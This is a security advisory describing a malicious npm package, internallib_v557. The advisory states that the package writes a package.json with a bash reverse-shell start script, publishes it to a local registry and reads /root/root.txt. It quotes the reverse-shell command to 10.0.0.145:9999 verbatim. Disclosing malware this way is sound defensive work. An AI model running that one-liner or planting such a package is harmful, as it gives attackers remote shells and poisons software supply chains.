—

MAL-2026-5678

Malicious code in internallib_v557 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (5cfa498f80e5965de3c072803c8d6e812e75bc5a4fb031f739cbd9c181724be3) internallib_v557 has no legitimate functionality — its single exported `command()` function in index.js writes a malicious package.json to /tmp/uhclabs_local_check/ whose `start` script is a bash reverse shell to 10.0.0.145:9999 (`/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.145/9999 0>&1'`), then runs `npm publish --registry http://0.0.0.0:4873/` to push that reverse-shell-bearing package into a local Verdaccio registry where it can be pulled by other consumers. The same function also executes `cat /root/root.txt` and logs the contents to stdout, attempting to exfiltrate a privileged host file the package has no legitimate need to read. The harmful path fires when any consumer requires the package and invokes the advertised API; since the package has no other functionality, normal use guarantees compromise.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / internallib_v557

No fixed version published yet for internallib_v557 (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/internallib_v557/v/1.0.10 [PACKAGE]